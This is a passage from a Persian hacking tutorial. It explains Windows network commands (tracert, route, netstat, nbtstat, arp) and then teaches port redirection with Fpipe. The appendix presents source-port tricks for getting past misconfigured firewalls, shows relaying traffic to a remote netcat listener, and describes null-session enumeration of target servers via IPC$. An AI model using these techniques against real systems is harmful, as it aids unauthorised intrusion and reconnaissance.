اﺱﺘﻔﺎدﻩ ﮐﻨﻨﺪ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –w‬ﻣﺪت زﻣﺎﻧﯽ ﮐﻪ ﺱﻴﺴﺘﻢ ﺏﺎیﺪ ﻣﻨﺘﻈﺮ هﺮ ﭘﺎﺱﺦ ﺏﻤﺎﻧﺪ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺏﺎز هﻢ ﻣﻦ ﻓﻘﻂ ﭘﺎراﻣﺘﺮ هﺎ را ﺕﻮﺽﻴﺢ دادم و اداﻣﻪ ﮐﺎر ﺏﺎ ﺧﻮدﺕﺎن !!‬ ‫ﻓﺮﻣﺎن ‪: Tracert‬‬ ‫ایﻦ ﻓﺮﻣﺎن ﺏﺮای ﻣﺸﺨﺺ ﮐﺮدن ﻣﺴﻴﺮی اﺱﺖ ﮐﻪ ﺏﺮای رﺱﻴﺪن ﺏﺴﺘﻪ اﻃﻼﻋﺎﺕﯽ ﺷﻤﺎ ﺏﻪ هﺪف ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﮔﺮﻓﺘﻪ اﺱﺖ‪.‬‬ ‫دارای ﭼﻬﺎر ﺱﻮیﭻ اﺱﺖ ﮐﻪ ﺕﻮﺽﻴﺢ ﺁﻧﻬﺎ در زیﺮ ﺁﻣﺪﻩ اﺱﺖ ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –d‬ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺱﻮیﭻ ﻓﻘﻂ در ﻧﻤﺎیﺶ ﻧﺘﺎیﺞ ‪ IP‬هﺎ ﻧﺸﺎن دادﻩ ﻣﻴﺸﻮد‪.‬‬ ‫ﺱﻮیﭻ ‪ : –h‬ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺱﻮیﭻ ﺡﺪاﮐﺜﺮ ﺕﻌﺪاد ﻣﺎﺷﻴﻨﻬﺎ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﻴﺪ ﮐﻪ اﻟﺒﺘﻪ ﭘﻴﺶ ﻓﺮض ‪ ٣٠‬اﺱﺖ ﮐﻪ ﮐﺎﻓﯽ اﺱﺖ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –j‬ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺱﻮیﭻ از یﮏ ﻓﺎیﻞ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –w‬ﻣﺪت زﻣﺎﻧﯽ ﮐﻪ ﺱﻴﺴﺘﻢ ﺏﺎیﺪ ﻣﻨﺘﻈﺮ هﺮ ﭘﺎﺱﺦ ﺏﻤﺎﻧﺪ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬ ‫دﺱﺘﻮر ‪: Telnet‬‬ ‫ایﻦ دﺱﺘﻮر ﺏﺮای وﺻﻞ ﺷﺪن ﺏﻪ یﮏ ﭘﻮرت ﺧﺎص اﺱﺖ ﺏﻪ ایﻦ ﺻﻮرت ﮐﻪ ‪:‬‬ ‫‪C :\> telnet xxx.xxx.xxx.xxx port number‬‬ ‫دﺱﺘﻮر ‪: Route‬‬ ‫ایﻦ ﻓﺮﻣﺎن ﺏﺮای ﻣﺸﺎهﺪﻩ ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ و اﺽﺎﻓﻪ یﺎ ﺡﺬف ﮐﺮدن اﻗﻼم ﺁن اﺱﺖ‪ ) .‬ﺟﺪول ﻣﺴﻴﺮ ی ﺎﺏﯽ ﺏ ﺮای ﺕﻌﻴ ﻴﻦ ﻣ ﯽ ﮐﻨ ﺪ ه ﺮ ﺏ ﺴﺘﻪ ﺏﺎی ﺪ ﺱ ﺮ از‬ ‫ﮐﺠﺎ در ﺏﯽ ﺁورد !! (‪.‬‬ ‫] ]‪ROUTE [-F] [-P] [command [destination] [MASK netmask] [gateway] [METRIC metric] [IF interface‬‬ ‫ﻣﺘﻐﻴﻴﺮ ‪ command‬یﮑﯽ از ایﻦ ﭼﻬﺎر ﻣﻘﺪار را ﻣﯽ ﮔﻴﺮد‪:‬‬ ‫اﮔﺮ ﺏﻪ ﻓﺮﻣﺎن ﺱﻮیﭻ ‪ –PRINT‬را اﺽﺎﻓﻪ ﮐﻨﻴﺪ ﻣﺤﺘﻮای ﺟﺪول را ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ ‪.‬‬ ‫‪ : -ADD‬یﮏ ﻓﻘﺮﻩ ﺟﺪیﺪ در ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ ایﺠﺎد ﻣﻴﮑﻨﺪ‪.‬‬ ‫‪ : -DELETE‬یﮏ ﻓﻘﺮﻩ از ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ را ﺡﺬف ﻣﻴﮑﻨﺪ‪.‬‬ ‫‪ : -CHANGE‬ﭘﺎراﻣﺘﺮهﺎی یﮑﯽ از ﻣﻘﺎدیﺮ ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ را ﺕﻐﻴﻴﺮ ﻣﻴﺪهﺪ‪.‬‬ ‫ﺱﺎیﺮ ﭘﺎراﻣﺘﺮهﺎی ﺧﻂ ﻓﺮﻣﺎن ‪:‬‬ ‫‪ : -f‬هﻤﻪ اﻏﻼم ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ را ﺡﺬف ﻣﻴﮑﻨﺪ‪.‬‬ ‫‪ : -p‬اﮔﺮ هﻤﺮاﻩ ﺱﻮیﭻ ‪ add‬ﺏﻪ ﮐﺎر رود یﮏ ﻓﻘﺮﻩ داﺋﻤﯽ ایﺠﺎد ﻣﻴﮑﻨﺪ‪.‬‬ ‫‪ : - destination‬ﺁدرس ﺷﺒﮑﻪ یﺎ ﻣﻴﺰﺏﺎن ﻓﻘﺮﻩ هﺎی از ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﯽ ﮐﻪ اﺽﺎﻓﻪ یﺎ ﺡﺬف ﻣﻴﺸﻮد و یﺎ ﺕﻐﻴﻴﺮ دادﻩ ﻣﻴﺸﻮد را ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ‪.‬‬ ‫‪ : - MASK netmask‬ﻣﺎﺱﮏ زیﺮ ﺷﺒﮑﻪ ﻣﺘﻨﺎﻇﺮ ﺏﺎ ﺁدرس ﻣﺸﺨﺺ ﺷﺪﻩ ﺕﻮﺱﻂ ﻣﺘﻐﻴﺮ ‪ destination‬را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬ ‫‪ : - gateway‬ﺁدرس ﻣﺴﻴﺮ یﺎﺏﯽ ﮐ ﻪ ﺏ ﺮای دﺱ ﺘﻴﺎﺏﯽ ﺏ ﻪ ﺁدرس ﻣﻴﺰﺏ ﺎن ی ﺎ ﺷ ﺒﮑﻪ ﻣ ﺸﺨﺺ ﺷ ﺪﻩ ﺕﻮﺱ ﻂ ﻣﺘﻐﻴ ﺮ ‪ destination‬ﺏ ﻪ ﮐ ﺎر رﻓﺘ ﻪ اﺱ ﺖ را‬ ‫ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﻓﺮﻣﺎن ‪: Netstat‬‬

٥٨

‫ﺻﻔﺤﻪ‬

!! ‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم‬ : ‫ﺧﻮب ایﻦ ﻓﺮﻣﺎن ﺷﮑﻞ ﻋﻤﻮﻣﯽ ﺁن ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ‬

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] ‫ﺕﻮﺽﻴﺤﺎت ﺱﻮیﭻ‬ ‫( ﻧﺸﺎن ﻣﻲ‬connections) ‫( ﺏﻪ ﺱﺮ ﻣﻴﺒﺮﻧﺪ ﺏﻪ هﻤﺮاﻩ ﺏﻘﻴﻪ اﺕﺼﺎﻻت‬listening) ‫ﺕﻤﺎﻣﻲ ﭘﻮرت هﺎیﻲ ﮐﻪ در وﺽﻌﻴﺖ ﺷﻨﻮد‬ .‫دهﺪ‬ .‫( را ﻧﺸﺎن ﻣﻲ دهﺪ‬Ethernet) ‫ﺁﻣﺎر اﺕﺮﻧﺖ‬ .‫ﺁدرس هﺎ و اﻋﺪاد ﭘﻮرت هﺎ را ﺏﻪ ﻓﺮم ﻋﺪدي ﻧﺸﺎن ﻣﻲ دهﺪ‬ .‫ ﻣﺸﺨﺺ ﺷﺪﻩ را ﻧﺸﺎن ﻣﻲ دهﺪ‬proto ‫( ﻣﺮﺏﻮط ﺏﻪ ﭘﺮوﺕﮑﻠﻲ ﮐﻪ ﺕﻮﺱﻂ‬connections) ‫ﺕﻤﺎﻣﻲ اﺕﺼﺎﻟﺖ‬ .‫( را ﻧﺸﺎن ﻣﻲ دهﺪ‬routing table) ‫ﺕﻤﺎﻣﻲ ﻣﺤﺘﻮیﺎت ﺟﺪول ﻣﺴﻴﺮ یﺎﺏﻲ‬ .‫ ﻧﺸﺎن دادﻩ ﻣﻲ ﺷﻮد‬IP ‫و‬UDP، TCP‫ در ﺡﺎﻟﺖ ﭘﻴﺶ ﮔﺰیﺪﻩ ﺁﻣﺎر ﭘﺮوﺕﮑﻞ هﺎي‬.‫ﺁﻣﺎر هﺮ ﭘﺮوﺕﮑﻞ را ﻧﺸﺎن ﻣﻲ دهﺪ‬ .‫ﺁﻣﺎر اﻧﺘﺨﺎﺏﻲ را ﻣﺠﺪدا ﺏﻪ ﻧﻤﺎیﺶ در ﻣﻲ ﺁورد‬

‫ﺱﻮیﭻ‬ -a

١

-e -n -s -p proto -r interval

٢ ٣ ۴ ۵ ۶ ٧

: Ipconfig ‫دﺱﺘﻮر‬ !! ‫ ﺕﺎﺏﻠﻮ‬.‫ ﺧﻮب ﺏﻪ ﺏﻴﻨﻴﺪ ﭼﻪ ﻣﻴﺸﻮد‬،،، ‫ ﺏﻪ ﮐﺎر ﺏﺒﺮیﺪ‬/all ‫ﺧﻮب اﮔﺮ دﺱﺘﻮر را ﺏﺎ ﭘﺎراﻣﺘﺮ‬ DHCP ‫ ﺏﻪ ﮐﺎر ﺏﺒﺮیﺪ ﺏﺮای ﺕﻘﺎﺽﺎی ﺧﺎﺕﻤﻪ دادن یﺎ ﺕﻤﺪیﺪ اﺟﺎرﻩ یﮏ ای ﺴﺘﮕﺎﻩ ﮐ ﺎری از ﺱ ﺮویﺲ‬/renew ‫ و‬/release ‫اﮔﺮ دﺱﺘﻮر را ﺏﺎ ﭘﺎراﻣﺘﺮ‬ .‫هﻢ ﻣﻴﺘﻮان اﺱﺘﻔﺎدﻩ ﮐﺮد‬ .‫– ﺏﻪ ﮐﺎر ﺏﺒﺮیﺪ ﻟﻴﺴﺖ ﭘﺎراﻣﺘﺮ هﺎ را ﻣﺸﺎهﺪﻩ ﻣﯽ ﮐﻨﻴﺪ‬H ‫اﮔﺮ دﺱﺘﻮر را ﺏﺎ ﭘﺎراﻣﺘﺮ‬ : Nbtstat ‫ﻓﺮﻣﺎن‬ ‫هﻨﮕﺎم ﮐﻨﺘﺮل ﮐﻨﻨﺪﻩ هﺎی ﺕﻌﻴﻴﻦ داﻣﻨﻪ و یﺎ ﺱﺮویﺲ دهﻨﺪﻩ هﺪف ﻗﺎدر ﺏﻪ ﺏﮑﺎرﮔﻴﺮی ایﻦ ﻓﺮﻣﺎن ﺧﻮاهﻴﻢ ﺏﻮد ﺕﺎ ﺟﺪول اﺱﺎﻣﯽ را از ﺱﺮویﺲ دهﻨﺪﻩ‬ . ‫ و ﮐﻼ ﺟﻬﺖ ﺕﺸﺨﻴﺺ اﻃﻼﻋﺎت ﻣﻔﻴﺪ در ﺏﺎرﻩ ﺱﺮویﺲ دهﻨﺪﻩ هﺪف اﺱﺖ‬.‫هﺪف ﺏﺪﺱﺖ ﺁوریﻢ‬ C:\>nbtstat Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP). NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ] -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. -c (cache) Lists NBT's cache of remote [machine] names and their IP addresses -n (names) Lists local NetBIOS names. -r (resolved) Lists names resolved by broadcast and via WINS -R (Reload) Purges and reloads the remote cache name table -S (Sessions) Lists sessions table with the destination IP addresses -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names. -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh RemoteName Remote host machine name. IP address Dotted decimal representation of the IP address. interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.

: Getmac ‫اﺑﺰار‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٥٩‬‬

‫ﺟﻬﺖ ﮐﺴﺐ اﻃﻼﻋﺎت اﻧﺘﻘﺎﻟﯽ ﺷﺒﮑﻪ از ﺱﺮویﺲ دهﻨﺪﻩ هﺪف ﻣﻴﺘﻮان از ﻓﺮﻣﺎن ﻣﺰﺏﻮر اﺱﺘﻔﺎدﻩ ﮐﺮد‪ .‬ایﻦ اﺏ ﺰار ﻧ ﺸﺎﻧﯽ ‪ MAC‬ﺱ ﺮویﺲ دهﻨ ﺪﻩ ه ﺪف‬ ‫و ‪ ...‬را ﺏﻪ ﻣﺎ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ و اﻟﺒﺘﻪ ﺏﻪ اﺕﺼﺎل ‪ Null Session‬اﺡﺘﻴﺎج دارد‪.‬‬ ‫دﺱﺘﻮر ‪: ARP‬‬ ‫ایﻦ ﻓﺮﻣﺎن راﺏﻄﻪ ﺏﻴﻦ ﺁدرس ﻓﻴﺰیﮑﯽ ) ‪ ( MAC‬ﻣﺎﺷﻴﻦ هﺎی ﻣﺴﺘﻘﺮ در یﮏ ﺷﺒﮑﻪ ایﻨﺘﺮﻧﺖ را ﺏﺎ ﺁدرس ‪ IP‬ان ﻣﺎﺷﻴﻦ در زیﺮ ﺷﺒﮑﻪ ) ‪SUB‬‬ ‫‪ ( NET‬ﺁﺷﮑﺎر ﻣﻴﮑﻨﺪ‪.‬‬ ‫هﺮ ﮐﺎرﺏﺮی از ﺷﺒﮑﻪ ﻗﺎدر اﺱﺖ راﺏﻄﻪ ﻣﺰﺏﻮر یﺎ ﺁدرس ‪ IP‬ﺧﻮد را دﺱﺘﺨﻮش ﺕﻐﻴﻴﺮ ﮐﻨﺪ و هﻮیﺖ دیﮕﺮان را ﺟﻌﻞ ﮐﻨﺪ !! ایﻦ دﺱﺘﻮر ﺏﺎﻻ ﺏﺮای‬ ‫ﺕﺸﺨﻴﺺ ایﻦ ﮐﺎر اﺱﺖ‪.‬‬ ‫ﺿﻤﻴﻤﻪ ﺵﻤﺎرﻩ دو ؛ ﺁﻣﻮزش ﺏﺮﻧﺎﻣﻪ هﺎی ﺕﻐﻴﻴﺮ ﻣﺴﻴﺮ ﭘﻮرت ‪:‬‬ ‫ایﻦ ﮐﺎر در ﻣﻮاﻗﻌﯽ ﮐﻪ اﻟﺒﺘﻪ ﻧﺎدر هﻢ ﻧﻴﺴﺖ ﺏﺴﻴﺎر اﻧﺠﺎم ﻣﻴﺸﻮد‪ .‬ﺏﺮای ایﻦ ﻣﻨﻈﻮر از دو ﺏﺮﻧﺎﻣﻪ ‪ Datapipe‬و ‪ Fpipe‬اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد ﮐﻪ اوﻟﯽ ﭘﺪر‬ ‫دوﻣﯽ اﺱﺖ و ﻣﺜﻞ روال هﻤﻴﺸﮕﯽ اول ﺏﺮی ﺧﺎﻧﻮادﻩ ﻟﻴﻨﻮﮐﺲ ﺱﺎﺧﺘﻪ ﺷﺪ ‪ .‬اﺏﺰار دوﻣﯽ ﺏﺮای ویﻨﺪوز اﺱﺖ و ﺏﺪون هﻴﭽﮕﻮﻧﻪ اﻏﺮاق ﺕﻤﺎم ﺡﺮﻓﻪ ایﯽ‬ ‫هﺎ ﻗﺒﻮل دارﻧﺪ ﮐﻪ ﺏﺮ ﺧﻼف ﺱﻨﺖ ایﻦ دﻓﻌﻪ اﺏﺰار ویﻨﺪوز ﻗﻮی ﺕﺮ اﺱﺖ‪.‬‬ ‫ایﻦ ﻻزم ﺏﮕﻢ ﮐﻪ ایﻦ اﺏﺰار)‪ (Datapipe‬ﺏﺎ ایﻦ ﮐﺎرایﯽ ﺧﻔﻦ ﻓﻘﻂ ﺏﺎ ‪ ١٠٠‬ﺧﻂ ﺏﺮﻧﺎﻣﻪ ﻧﻮﺷﺘﻪ ﺷﺪﻩ اﺱﺖ ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺲ هﺎ ﻣﻴﺪاﻧﻨﺪ ﻣﻦ ﭼﯽ ﻣﻴﮕﻢ !!‬ ‫اﺑﺰار ‪: Fpipe‬‬ ‫ایﻦ ﮐﺎر ﺏﺮای ﺕﻐﻴﻴﺮ ﻣﺴﻴﺮ ﻣﺎﺷﻴﻦ ‪ Client‬ﺡﻴﻦ ﻓﺮﺁیﻨﺪ در ﺧﻮاﺱﺖ ﺱﺮویﺲ وب و‪ ..‬اﻧﺠﺎم ﻣﻴﺪهﻴﻢ !!‬ ‫ﺏﻌﺪ از اﺟﺮای ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺎ ﺱﻮیﭻ ‪ ) –h‬هﻤﺎن ﺱﻮیﭻ ‪ Help‬اﺱﺖ ( ﺷﮑﻞ زیﺮ را ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ‪:‬‬ ‫‪C :\> fpipe.exe –h‬‬ ‫‪-? / -h‬‬ ‫‪-show this help test.‬‬ ‫‪-c‬‬ ‫‪- maximum allowed simultaneous TCP connection. Defaults is 32‬‬ ‫‪-i‬‬ ‫‪- listening interface IP Address.‬‬ ‫‪-l‬‬ ‫‪- remote port number‬‬ ‫‪-s‬‬ ‫‪- outbound source port number.‬‬ ‫‪-u‬‬ ‫‪- UDP mode.‬‬ ‫‪-v‬‬ ‫‪- Verbose mode.‬‬ ‫ﺧﻮب ﮔﺰیﻨﻪ هﺎی ﺕﺎﺏﻠﻮی دارد ﻣﺜﻼ ﻣﺜﻞ ﺏﻘﻴﻪ ﺏﺮﻧﺎﻣﻪ هﺎ ﺱﻮیﭻ ‪ –v‬ﺟﺰﺋﻴﺎت ﭘﻴﺸﺮﻓﺖ ﮐﺎر را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ ؛ ﺱﻮیﭻ ‪ –u‬ﺏﺮای ﭘﻮرت هﺎی ‪UDP‬‬ ‫اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد ‪ ....‬ﮐﻪ اﻟﺒﺘﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ اﺱﺎﺱﯽ ﻧﮕﺮان ﻧﺒﺎﺷﻴﺪ ﭼﻮن ﻓﮑﺮ ﻣﻴﮑﻨﻢ ﺕﺎ ﺏﻪ ﺡﺎل ﺏﺎ ایﻦ ﺁﺷﻨﺎیﯽ ﻧﺪاﺷﺘﻪ ﺏﺎﺷﻴﺪ‪.‬‬ ‫ﺏﺎ ﻣﺜﺎل ﺟﻠﻮ ﻣﻴﺮوم ﮐﻪ ﮐﺎرای هﻢ داﺷﺘﻪ ﺏﺎﺷﺪ !!‬ ‫ﺧﻮب ﻣﺜﻼ ﻣﺎ ﻣﻴﺨﻮاهﻴﻢ ﺕﺮاﻓﻴﮏ وب را از روی ﭘﻮرت ‪ ٨٠‬ﮐﻪ اﻟﺒﺘﻪ اﺱﺘﺎﻧﺪارد ایﻦ ﮐﺎر هﻢ هﺴﺖ ﺏﻪ ﭘﻮرت ‪ ٩٠٨٠‬ﻣﻨﺘﻘﻞ ﮐﻨﻴﻢ ﺕﺎ ﺡﺎل ﮐﻨﻴﻢ !!‬ ‫ﺏﺮای ایﻦ ﻣﻨﻈﻮر ﻣﻴﻨﻮیﺴﻴﻢ ‪:‬‬ ‫‪C :\> fpipe –l 9080 –r 80 www.google.com‬‬ ‫‪Pipe connected:‬‬ ‫‪In :‬‬ ‫‪127.0.0.1 : 1917 Æ 127.0.0.1 : 9080‬‬ ‫‪Out :‬‬ ‫‪192.168.0.148 :1972 Æ 216.239.33.101 : 80‬‬ ‫ایﻦ ﺏﺮﻧﺎﻣﻪ ﮔﺰارش اﺕﺼﺎل هﺎی ﻣﻮﺟﺪ را هﻨﮕﺎﻣﯽ ﮐﻪ ﮐﻠﻴﺪ ‪ Ctrl+C‬را ﺏﺮای ﺁن ﻓﺸﺎر ﻧﺪهﻴﺪ ﺏﺮای ﺷﻤﺎ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ‪ .‬ﺧﻮب ﺕﻮﺟﻪ ﮐﻨﻴﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ‬ ‫ﻋﻼوﻩ ﺏﺮ ﺁدرس ‪ IP‬ﻣﺒﺪا و ﻣﻘﺼﺪ و هﻤﭽﻨﻴﻦ ﺷﻤﺎرﻩ ﭘﻮرت ﻣﻨﺒﻊ هﺮ اﺕﺼﺎل را ﻧﻴﺰ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ‪.‬‬ ‫ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺱﻮیﭻ ‪ –s‬ﻣﯽ ﺕﻮان اﻣﮑﺎن ﺏﻬﺮﻩ ﺏﺮداری ﺏﻴﺸﺘﺮ از ﻣﺸﺨﺼﻪ ﭘﻮرت را در اﺧﺘﻴﺎر ﺏﺮﻧﺎﻣﻪ ﻗﺮار داد‪ .‬ﺏﻪ ﻣﺜﺎل زیﺮ ﺕﻮﺟﻪ ﮐﻨﻴﺪ‪.‬‬ ‫‪C: \> fpipe –l 139 –r 139 s 88 192.168.97.154‬‬ ‫ﺷﺎیﺪ ﺏﺎ ﻧﮕﺎﻩ اول ﺏﻪ ایﻦ ﻣﺜﺎل ﻓﮑﺮ ﮐﻨﻴﺪ ﮐﻪ ﻣﻦ دیﻮاﻧﻪ ام ﮐﻪ ﺕﺮاﻓﻴﮏ ‪ NetBIOS‬را دوﺏﺎرﻩ ﺏﻪ ﺧﻮدش ﺏﺮﮔﺮداﻧﺪم ﻣﺰیﺖ ایﻦ ﮐﺎر در ایﻦ ﻧﻬﻔﺘﻪ اﺱﺖ‬ ‫ﮐﻪ هﻤﻪ ﺕﺮاﻓﻴﮏ ‪ SMB‬در ﻓﺮﺁیﻨﺪ ﺕﻐﻴﻴﺮ ﻣﺴﻴﺮ ﻓﻮق از یﮏ ﭘﻮرت ﻣﻨﺒﻊ واﺡﺪ ) ﭘﻮرت ﺷﻤﺎرﻩ ‪ (٨٨‬ﺟﺎری ﻣﻴﺸﻮد‪ .‬از ایﻦ ﮐﺎر ﻣﻴﺸﻮد ﺟﻬﺖ ﺧﻨﺜﯽ‬ ‫ﺱﺎزی ﺕﺎﺙﻴﺮ دیﻮارهﺎی ﺁﺕﺸﯽ اﺱﺘﻔﺎدﻩ ﮐﺮد ﮐﻪ ﺏﮕﻮﻧﻪ ﻧﺎ ﻣﻨﺎﺱﺐ ﭘﻴﮑﺮ ﺏﻨﺪی ﺷﺪﻩ اﻧﺪ‪ .‬ﭘﻮرت هﺎی ﻗﺎﺏﻞ ﺕﻮﺟﻪ دیﮕﺮ ﺏﺮای ایﻦ ﻓﺮایﻨﺪ ﻋﺒﺎرﺕﻨﺪ از ‪ ٢٠‬و‬ ‫‪ ٢۵‬و ‪ ۵٣‬و ‪. ٨٠‬‬ ‫یﮏ ﻣﺜﺎل دیﮕﺮ ﻣﻴﺰﻧﻢ ﺏﻬﺘﺮ یﺎد ﺏﮕﻴﺮیﺪ !!‬ ‫ﺏﻪ ﻋﻨﻮان ﻣﺜﺎل اﮔﺮ ﻣﻴﺰﺏﺎن ‪ Remote‬دارای ‪ NC‬در ﭘﻮرت ‪ ١٠٠٠‬ﺏﺎﺷﺪ ‪ ،‬از ‪ Fpipe‬ﺟﻬﺖ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﺁن وﺱﻴﻠﻪ ﭘﻮرت ﻣﺒﺪا ﻣﺘﻔﺎوت‬ ‫اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ و در رایﺎﻧﻪ ﺧﻮدﻣﺎن دﺱﺘﻮر زیﺮ را وارد ﻣﻴﮑﻨﻴﻢ ‪:‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٦٠‬‬

‫‪C :\> Fpipe.exe –l 23 –s 25 –r 1000 xxx.xxx.xxx.xxx‬‬ ‫ایﻦ دﺱﺘﻮر ‪ Fpipe‬را ﺏﺮای ارﺕﺒﺎﻃﯽ در ﭘﻮرت ‪ ٢٣‬ایﺠﺎد ﻣﻴﮑﻨﺪ‪ .‬ﺏﻮﺱﻴﻠﻪ ‪ Telnet‬ﺟﻬﺖ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﭘﻮرت ‪ ٢٣‬ﺏﺮای دﺱﺘﮕﺎﻩ ﺁزﻣﺎیﺶ ‪،‬‬ ‫ﺕﺮاﻓﻴﮏ ﺏﺮای ﭘﻮرت ‪ ١٠٠٠‬در ﻣﻴﺰﺏﺎن ‪ Remote‬ﺏﺎ ‪ xxx.xxx.xxx.xxx IP‬ﺕﻌﻴﻴﻦ ﺧﻮاهﺪ ﺷﺪ ﮐﻪ از ﭘﻮرت ﻣﺒﺪا ‪ ٢۵‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ‪ .‬اﮐﻨﻮن ﻗﺎدر‬ ‫ﺏﻪ اﺱﺘﻔﺎدﻩ از ‪ NC‬از راﻩ دور هﺴﺘﻴﻢ !!‬ ‫ﺿﻤﻴﻤﻪ ﺵﻤﺎرﻩ ﺱﻪ ؛ اﺏﺰارهﺎی ﻣﻔﻴﺪ ﺏﺮای ویﻨﺪوز ‪:‬‬ ‫ﻣﻘﺪﻣﻪ ‪:‬‬ ‫ایﻦ اﺏﺰارهﺎیﯽ ﮐﻪ ایﻦ ﺟﺎ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﺏﺰارهﺎیﯽ ﺧﻮب هﺴﺘﻨﺪ ﮐﻪ ﮐﺎرایﯽ ﻋﺎﻟﯽ دارﻧﺪ اﻟﺒﺘﻪ اﮐﺜﺮا ﺏﺮای یﮏ ﮐﺎر ﺧﺎص هﺴﺘﻨﺪ و اﻟﺒﺘﻪ داﺧﻞ‬ ‫ویﻨﺪوز ﻧﻴﺴﺘﻨﺪ !!‬ ‫‪: Null Connection -١‬‬ ‫ﺧﻮب ایﻦ یﮏ اﺏﺰار ﻧﻴﺴﺖ ﺏﻠﮑﻪ ﺏﻪ ﻧﻮع ﺧﺎﺻﯽ ارﺕﺒﺎط ﺏﻴﻦ دو ﮐﺎﻣﭙﻴﻮﺕﺮ ﻣﻴﮕﻮیﻨﺪ ﮐﻪ ﻣﻬﻤﺎن ﮐﻪ درﺧﻮاﺱﺖ ارﺕﺒﺎط را ﻓﺮﺱﺘﺎدﻩ اﺱﺖ ﺕﺎ ﭘﺎیﺎن ﻧﺸﺴﺖ‬ ‫ﻧﺎﺷﻨﺎس ﺏﺎﻗﯽ ﺏﻤﺎﻧﺪ ‪.‬‬ ‫ایﻦ ﻧﻮع ارﺕﺒﺎط ﻣﻌﻤﻮﻻ ﺏﺪون ﻧﺎم ﮐﺎرﺏﺮ و ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﺮﻗﺮار ﻣﻴﺸﻮد ‪ ،‬از دﺱﺘﻮر ‪ NET USE‬ﺟﻬﺖ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ اﺷﺘﺮاک ﭘﻴﺶ ﻓﺮض‬ ‫‪ IPC$‬در ﺱﻴﺴﺘﻢ ویﻨﺪوز ‪ NT‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ‪ .‬ﺏﺎ اﺕﺼﺎل ایﻦ ﻧﻮع ﻣﻴﺘﻮان اﻃﻼﻋﺎﺕﯽ درﺏﺎرﻩ ﮐﺎرﺏﺮ ‪ ،‬ﮔﺮوﻩ ‪ ،‬و‪ ...‬ﺏﻪ دﺱﺖ ﺁورد‪ .‬ایﻦ اﺕﺼﺎل ﻧﻴﺎز ﺏﻪ‬ ‫ﺏﺎز ﺏﻮدن ﭘﻮرت ‪ ١٣٩‬دارد ‪.‬‬ ‫ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ ‪:‬‬ ‫‪C :\> net use \\ server name \ipc$ (( )) User (( ))/‬‬ ‫‪ -٢‬اﺑﺰار ‪: Dump SEC‬‬ ‫ایﻦ اﺏﺰار دریﺎﻓﺖ اﻃﻼﻋﺎت ﻓﻮق اﻟﻌﺎدﻩ در ﺏﺎرﻩ ﺱﺮویﺲ دهﻨﺪﻩ هﺎ و ﮐﺎرﺏﺮان 